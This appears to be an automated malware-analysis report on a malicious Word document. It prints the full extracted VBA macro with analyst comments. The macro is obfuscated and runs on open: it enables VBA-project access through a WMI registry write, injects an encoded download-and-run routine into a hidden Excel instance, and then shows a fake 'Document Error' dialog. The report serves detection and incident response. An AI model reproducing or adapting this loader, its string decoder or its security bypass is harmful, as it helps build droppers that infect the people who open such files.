Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e5c56c5b9620fb54…

MALICIOUS

Office (OLE)

364.5 KB Created: 2018-11-25 20:11:00 Authoring application: Microsoft Office Word First seen: 2020-12-25
MD5: 44c900bd374ebce1aac1f1e45958f0fe SHA-1: 0608182a5ee641ac33aea6fbd14862013ccd88e6 SHA-256: e5c56c5b9620fb542eab82bdf75237d179bc996584b5c5f7a1c34ef5ae521c7d
270 Risk Score

Heuristics 9

  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set cobw = GetObject(tkbl)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call — the argument is not a literal: it is assembled at runtime by the macro's `cada` decoder (3-digit decimal chunks, `Chr(n - 19)`) and decodes to `Excel.Application`, i.e. the macro starts a second Office process rather than acting from Word.
    Matched line in script
        Set xl = CreateObject(cada("088139118" & agny & "2706508413113112712" & kpwj & "11613512" & eeoa & "129"))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call — the moniker is decoded at runtime to `winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv`, the WMI registry provider; the macro uses it to write a registry value without any registry API name appearing in the source.
    Matched line in script
        Set cobw = GetObject(tkbl)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call — every COM property and method in the macro is invoked this way with a decoded member name (`Version`, `Assistant`/`DoAlert`, `SetDWORDValue`, `Visible`, `DisplayAlerts`, `Workbooks`/`Add`, `VBProject`/`VBComponents`/`CodeModule`/`AddFromString`, `Run`), so none of those names appears as a literal in the source.
    Matched line in script
        Set zyom = CallByName(tkbl, cada("084" & ucdo & "34124" & ucdo & "351" & rvzd & "9135"), zrec)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line, which is not reproduced on this page; for this sample the extracted source shows `Document_Open` paired with `CreateObject` and `GetObject`.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro — runs on open, with no user interaction beyond enabling macros, and calls `lkod`, `hzla` and `auhr` in that order (registry write to enable VBA-project access, hidden-Excel code injection, decoy error dialog).
    Matched line in script
    Private Sub Document_Open()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML schema namespace URI carried by essentially every Office document; it is not an indicator of compromise and should not be blocked or hunted on.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9284 bytes
SHA-256: a1c97c9ccf93a390ed90df24de27f710f9f5ffc4965fa4cb022017d8ef6a8f33
Preview script
First 1,000 lines of the extracted script (this script is shorter than that, so it appears to be shown in full)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



' Auto-exec entry point: runs as soon as the document is opened with macros
' enabled (OLE_VBA_DOCOPEN). Each stage is called for its side effects only,
' and the order matters:
'   lkod - via the WMI StdRegProv provider, writes
'          HKCU\Software\Microsoft\Office\<Application.Version>\Excel\Security\AccessVBOM = 1
'          so Excel will expose its VBProject to automation
'   hzla - starts a hidden Excel.Application, injects decoded VBA into a new
'          workbook's code module via AddFromString and runs it
'   auhr - pops a decoy "Document Error" dialog through Application.Assistant
'          after the payload has already been launched
Private Sub Document_Open()

lkod
hzla
auhr

End Sub

' Decoy stage: shows an error dialog so the user believes the document simply
' failed to open. Every string is rebuilt at runtime by cada() (3-digit
' chunks, Chr(n - 19)); decoded values:
'   1st CallByName name   -> "Assistant"   (Application.Assistant, read via zrec = VbGet)
'   2nd CallByName name   -> "DoAlert"     (invoked with VbMethod)
'   DoAlert 1st argument  -> "Document Error"
'   DoAlert 2nd argument  -> "The document version is not compatible with this word office version"
' The trailing numeric arguments (0, 1, 0, 0, 0) are DoAlert button/icon
' flags and were not decoded for this note.
Function auhr()
    Set tkbl = Application
    Set zyom = CallByName(tkbl, cada("084" & ucdo & "34124" & ucdo & "351" & rvzd & "9135"), zrec)
    CallByName zyom, cada("087130084127" & agny & "33135"), VbMethod, cada("0871301" & gjsg & "6128" & agny & "291350" & owky & "8133133130133"), cada("1031231200511191301" & gjsg & "6128" & agny & "291350" & woor & "7" & agny & "33" & ucdo & "2" & eeoa & "" & irnx & "511" & fkrq & "40511291301350511" & gjsg & "01281311161351241171271200" & woor & "81" & fkrq & "512305" & kech & "1231" & fkrq & "40" & woor & "81301331190" & woor & "012112112" & kpwj & "1200" & woor & "7" & agny & "33" & ucdo & "2" & eeoa & "129"), 0, 1, 0, 0, 0
End Function
' Stage 1: defeat the "Trust access to the VBA project object model" setting
' so that hzla can later write into a workbook's VBProject. No registry API
' appears in the source - the write goes through the WMI registry provider
' obtained with GetObject (wrapped in cobw). Decoded cada() strings, in order:
'   "Version"                                  (read from Application via zrec = VbGet)
'   "Software\Microsoft\Office\" & Application.Version & "\Excel\Security"
'   "AccessVBOM"
'   "winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv"
'   "SetDWORDValue"
' &H80000001 is StdRegProv's HKEY_CURRENT_USER constant, so the net effect is
' HKCU\Software\Microsoft\Office\<Version>\Excel\Security\AccessVBOM = 1.
' DFIR note: that value being 1 for the user is a durable artifact of this
' stage and survives the document being closed.
Function lkod()
    ' VBA quirk: only zyom is declared As String here; tkbl is a Variant.
    Dim tkbl, zyom As String
    Set tofj = Application
    eojx = CallByName(tofj, cada("105" & agny & "33" & ucdo & "2" & eeoa & "129"), zrec)
    tkbl = cada("10213012" & kech & "138116133" & agny & "110961241" & gjsg & "3130" & ucdo & "3012" & kech & "11109812112112" & kpwj & "" & agny & "11") & eojx & cada("111088139118" & agny & "27111102" & agny & "" & gjsg & "61331" & fkrq & "5140")
    zyom = cada("08" & kpwj & "118" & agny & "34" & ucdo & "05085098096")
    Set uzxe = cobw(cada("1381241" & rbdv & "8122128135134077142124128131" & agny & "33" & ucdo & "3012911613512" & eeoa & "" & irnx & "95" & agny & "37" & agny & "27080124128131" & agny & "33" & ucdo & "30129116135" & agny & "44052111111065111133130130135111119" & agny & "21116136127135077102135119101" & agny & "22099133130137"))
    ' SetDWORDValue(hDefKey = HKCU, sSubKeyName = tkbl, sValueName = "AccessVBOM", uValue = 1)
    CallByName uzxe, cada("102" & agny & "350871060981010871051" & rvzd & "7136120"), VbMethod, &H80000001, tkbl, zyom, 1

End Function

' Thin GetObject wrapper so the GetObject keyword only appears here, away from
' the call site. The single visible caller (lkod) passes the WMI moniker
' "winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv".
Function cobw(tkbl As String) As Object
    Dim bound As Object
    Set bound = GetObject(tkbl)
    Set cobw = bound
End Function

' Central string decoder for every COM name and literal in this macro.
' The argument is a run of 3-digit decimal codes; each code is turned into
' Chr(code - 19) and the characters are concatenated. Example:
' "088139118" -> "Exc". Callers splice the short digit fragments returned by
' agny(), gjsg(), ... into their arguments first, so the 3-digit chunks
' straddle the pieces and no recognisable substring exists in the source.
' Behaviour on malformed input is preserved from the original: the loop body
' always runs once and the remainder is taken with Right(s, Len(s) - 3), so
' an empty string or a length of 1-2 raises a runtime error. The parameter
' is consumed in place (ByRef), as before.
Function cada(zyom As String) As String
    Dim decoded As String
    decoded = ""
    Do
        ' take the leading 3-digit code, decode it, and drop it from the input
        decoded = decoded & Chr(Left(zyom, 3) - 19)
        zyom = Right(zyom, Len(zyom) - 3)
    Loop While Len(zyom) > 0
    cada = decoded
End Function

' Decodes one 3-digit code into its character: Chr(code - 19).
' zyom arrives as a numeric string such as "088"; VBA coerces it for the
' subtraction, so lzpb("088") = "E".
Function lzpb(zyom)
    Dim charCode As Long
    charCode = zyom - 19
    lzpb = Chr(charCode)
End Function
' Returns the next 3-digit code from the front of a cada() input
' (the first three characters; fewer if the string is shorter).
Function ahfd(zyom)
    ahfd = Mid(zyom, 1, 3)
End Function
' Drops the leading 3-digit code from a cada() input and returns the rest.
' Uses Right(s, Len(s) - 3) exactly as before, so a string shorter than
' three characters raises "Invalid procedure call" rather than returning "".
Function bppe(zyom)
    Dim remaining As Long
    remaining = Len(zyom) - 3
    bppe = Right(zyom, remaining)
End Function

' Stage 2: run the real payload from a hidden Excel instance instead of this
' Word document, so the dropped code never touches this file's VBA project.
' The body sits in an endless Do While True with On Error GoTo Handler: any
' COM failure lands on Handler, which falls through to Loop and restarts from
' the top; only the GoTo nnt after a successful Run leaves the loop.
' (Whether VBA actually re-arms the handler on the next iteration without a
' Resume was not verified here - treat the retry as the apparent intent.)
' Requires AccessVBOM = 1, which lkod sets beforehand. Decoded cada() strings
' are noted next to each statement below.
Function hzla()

    Do While True
    On Error GoTo Handler
    ' VBA quirk: only xw is declared As Object; xl is a Variant.
    Dim xl, xw As Object
    ' "Excel.Application" - a second, separate Office process
    Set xl = CreateObject(cada("088139118" & agny & "2706508413113112712" & kpwj & "11613512" & eeoa & "129"))

    ' "Visible" = False (ozgy returns VbLet) - the instance stays hidden
    CallByName xl, cada("105124" & ucdo & "24117127120"), ozgy, False
    ' "DisplayAlerts" = False
    CallByName xl, cada("087124" & ucdo & "31127116140084127" & agny & "33135134"), ozgy, False
    ' xv = xl.Workbooks ; xw = Workbooks.Add (zrec returns VbGet)
    Set xv = CallByName(xl, cada("1061301" & umqm & "6117130130126134"), zrec)
    Set xw = CallByName(xv, cada("084119119"), zrec)
    ' xx = xl.ActiveWorkbook ; nn = ActiveWorkbook.Name (used as the Run macro prefix)
    Set xx = CallByName(xl, cada("0841" & gjsg & "51" & fkrq & "7" & agny & "061301" & umqm & "6117130130126"), zrec)
    nn = CallByName(xx, cada("0971" & rvzd & "8120"), zrec)
    ' xq = xw.VBProject ; xr = VBProject.VBComponents ; xt = VBComponents(1).CodeModule
    ' (component 1 is evidently ThisWorkbook, given the Run target below)
    Set xq = CallByName(xw, cada("105085099133130125" & agny & "" & gjsg & "5"), zrec)
    Set xr = CallByName(xq, cada("105085086130128131130129" & agny & "29135134"), zrec)
    Set xt = CallByName(xr(1), cada("086130119120096130119136127120"), zrec)
    ' xt.AddFromString(<decoded VBA source>) - injects a routine into the new
    ' workbook. The single cada() argument spanning the continuation lines
    ' decodes to source beginning "Function e()" / "Dim WinHttpReq As Object" /
    ' Set WinHttpReq = CreateObject("Microsoft.XMLHTTP"); the remainder was not
    ' decoded for this note - expect a download-and-execute routine, confirm
    ' by decoding the full argument.
    CallByName xt, cada("0841191190891331301281021351" & umqm & "41" & rbdv & "2"), VbMethod, cada("0891361291" & gjsg & "512" & eeoa & "" & irnx & "511200590600" & pdwi & "" & kjry & "0510510" & owky & "7124" & xucn & "" & kbxb & "6124" & irnx & "9" & kech & "135131101" & agny & "320" & owky & "4134051098117125" & agny & "" & gjsg & "50" & pdwi & "" & kjry & "0510510" & kbxb & "2" & agny & "350" & kbxb & "6124" & irnx & "9" & kech & "135131101" & agny & "320" & owky & "00" & owky & "613" _
& "3" & agny & "16135120098117125" & agny & "" & gjsg & "50590530961241" & gjsg & "3130" & ucdo & "3012" & kech & "0651070960950911031030990530600" & pdwi & "" & kjry & "0510510" & kbxb & "6124" & irnx & "9" & kech & "135131101" & agny & "32065098131" & agny & "" & cyao & "10530900881030530630510531231351351310770" _
& "660661301231200651241200661181271240661241" & gjsg & "0" & irnx & "651311" & rbdv & "20530630" & owky & "91" & rvzd & "7" & ucdo & "200" & pdwi & "" & kjry & "0510510" & kbxb & "6124" & irnx & "9" & kech & "135131101" & agny & "32065134" & agny & "291190" & pdwi & "90" & pdwi & "" & kjry & "0510510511281401041010950" & owky & "00" & kbxb & "6" _
& "124" & irnx & "9" & kech & "135131101" & agny & "32065133" & agny & "" & oxdg & "1130129" & ucdo & "200851301191400" & pdwi & "" & kjry & "0510510510921210" & kbxb & "6124" & irnx & "9" & kech & "135131101" & agny & "320651021351161351361340" & owky & "00510690670670" & kbxb & "3123" & agny & "290" & pdwi & "" & kjry & "05105105105105" _
& "10510" & kbxb & "2" & agny & "350" & woor & "0102135133" & agny & "16" & xucn & "" & owky & "00" & owky & "6133" & agny & "16135120098117125" & agny & "" & gjsg & "5059053084087098087085065102135133" & agny & "16" & xucn & "530600" & pdwi & "" & kjry & "0510510510510510510" & woor & "0102135133" & agny & "16" & xucn & "65098131" & agny & "290" _
& "" & pdwi & "" & kjry & "0510510510510510510" & woor & "0102135133" & agny & "16" & xucn & "651031401311200" & owky & "00510680" & pdwi & "" & kjry & "0510510510510510510" & woor & "0102135133" & agny & "16" & xucn & "651061331" & fkrq & "51200" & kbxb & "6124" & irnx & "9" & kech & "135131101" & agny & "32065133" & agny & "" & oxdg & "1130129" _
& "" & ucdo & "200851301191400" & pdwi & "" & kjry & "0510510510510510510" & woor & "0102135133" & agny & "16" & xucn & "65102116137" & agny & "03130089124127120051053086077111136134" & agny & "33" & ucdo & "1113113611712712" & kpwj & "1111381241" & rbdv & "21191241" & rbdv & "206513513512105306305" _
& "10690" & pdwi & "" & kjry & "0510510510510510510" & woor & "0102135133" & agny & "16" & xucn & "65086127130" & ucdo & "200" & pdwi & "" & kjry & "0510510" & owky & "812911" & kjry & "0921210" & pdwi & "90" & pdwi & "90" & pdwi & "" & kjry & "0510510" & kbxb & "2123" & agny & "27127051053118128119065" & agny & "391200510661050770980970" _
& "66086053053134" & agny & "35051071089075080131130138" & agny & "33" & ucdo & "23" & agny & "27127051064" & agny & "39" & agny & "18051117140131116" & ucdo & "3405106" & kpwj & "051126124" & agny & "39059110102140134074" & agny & "28065103" & agny & "390740650881291" & gjsg & "01191241" & rbdv & "2112077" _
& "0770841020691300920920651411200741020741" & umqm & "41" & rbdv & "2059110102140134074" & agny & "28065069130130129137" & agny & "33074112077077089133130" & xucn & "85116" & ucdo & "200730711020741" & umqm & "41" & rbdv & "20590591221200740641" & gjsg & "0" & irnx & "74" & agny & "2907405" _
& "1058069130077111136134" & agny & "33" & ucdo & "1113113611712712" & kpwj & "1111381241" & rbdv & "21191241" & rbdv & "2065074074121058125125125125126057057134" & agny & "350" & kbxb & "2109080052071089075077069130080086052057057134" & agny & "35051" & agny & "280800521021" _
& "09077074080135052057057134" & agny & "350" & kbxb & "3088134080052" & agny & "28077125080060052057057134" & agny & "35051072097068109080052103088134077141080090052057057134" & agny & "350" & woor & "7101" & xucn & "80052072097068109077126080053053053053052" _
& "057057134" & agny & "350510710900800530530530530570571181" & rvzd & "7127051056137101" & xucn & "770530530530530800520710900771450640670630680520560530530530630510670" & pdwi & "90" & pdwi & "90881291190" & owky & "91361291" & gjsg & "512" & eeoa & "" & irnx & "" & pdwi & "9")
    ' xl.Run <workbook name> & "!ThisWorkbook.e" - executes the injected Function e()
    CallByName xl, cada("101136129"), VbMethod, nn & cada("052103123124" & ucdo & "061301" & umqm & "6117130130126065120")
    GoTo nnt
    
Handler:

    Loop
    
nnt:
End Function

' Converts a numeric literal to its string form (CStr); used only by the
' digit-fragment functions (agny, gjsg, ...) that feed cada().
Function dmcx(tkbl)
    Dim asText As String
    asText = CStr(tkbl)
    dmcx = asText
End Function

' Returns VbGet (property read) for CallByName, so the constant itself
' never appears at the call sites.
Function zrec()
    Dim mode As VbCallType
    mode = VbGet
    zrec = mode
End Function

' Returns VbLet (property assignment) for CallByName; used to set
' Visible and DisplayAlerts on the hidden Excel instance.
Function ozgy()
    Dim mode As VbCallType
    mode = VbLet
    ozgy = mode
End Function


' Obfuscation filler: the digit fragment "1813" that callers splice into the
' strings handed to cada(). Meaningless on its own; only the re-chunked
' concatenation decodes.
Function gjsg()
    gjsg = CStr(1813)
End Function


' Obfuscation filler: the digit fragment "1201" spliced into cada() inputs.
Function agny()
    agny = CStr(1201)
End Function


' Obfuscation filler: the digit fragment "5110" spliced into cada() inputs.
Function kbxb()
    kbxb = CStr(5110)
End Function


' Obfuscation filler: the digit fragment "1290" spliced into cada() inputs.
Function irnx()
    irnx = CStr(1290)
End Function


' Obfuscation filler: the digit fragment "1341" spliced into cada() inputs.
Function ucdo()
    ucdo = CStr(1341)
End Function


' Obfuscation filler: the digit fragment "1135" spliced into cada() inputs.
Function kech()
    kech = CStr(1135)
End Function


' Obfuscation filler: the digit fragment "4130" spliced into cada() inputs.
Function eeoa()
    eeoa = CStr(4130)
End Function


' Obfuscation filler: the digit fragment "3202" spliced into cada() inputs
' (used only inside the AddFromString payload string in hzla).
Function pdwi()
    pdwi = CStr(3202)
End Function


' Obfuscation filler: the digit fragment "2413" spliced into cada() inputs.
Function fkrq()
    fkrq = CStr(2413)
End Function


' Obfuscation filler: the digit fragment "2912" spliced into cada() inputs.
Function rbdv()
    rbdv = CStr(2912)
End Function


' Obfuscation filler: the digit fragment "2905" spliced into cada() inputs
' (used only inside the AddFromString payload string in hzla).
Function cyao()
    cyao = CStr(2905)
End Function


' Obfuscation filler: the digit fragment "5108" spliced into cada() inputs.
Function owky()
    owky = CStr(5108)
End Function


' Obfuscation filler returning "2012". Unlike its siblings it is not
' referenced anywhere in the visible macro - possibly leftover from the
' generator, or used by code outside this module.
Function lbhx()
    lbhx = CStr(2012)
End Function


' Obfuscation filler: the digit fragment "1280" spliced into cada() inputs
' (used only inside the AddFromString payload string in hzla).
Function xucn()
    xucn = CStr(1280)
End Function


' Obfuscation filler: the digit fragment "4118" spliced into cada() inputs.
Function kpwj()
    kpwj = CStr(4118)
End Function


' Obfuscation filler: the digit fragment "5113" spliced into cada() inputs.
Function woor()
    woor = CStr(5113)
End Function


' Obfuscation filler: the digit fragment "9051" spliced into cada() inputs
' (used only inside the AddFromString payload string in hzla).
Function kjry()
    kjry = CStr(9051)
End Function


' Obfuscation filler: the digit fragment "3312" spliced into cada() inputs.
Function umqm()
    umqm = CStr(3312)
End Function


' Obfuscation filler: the digit fragment "1612" spliced into cada() inputs.
Function rvzd()
    rvzd = CStr(1612)
End Function


' Obfuscation filler: the digit fragment "3413" spliced into cada() inputs
' (used only inside the AddFromString payload string in hzla).
Function oxdg()
    oxdg = CStr(3413)
End Function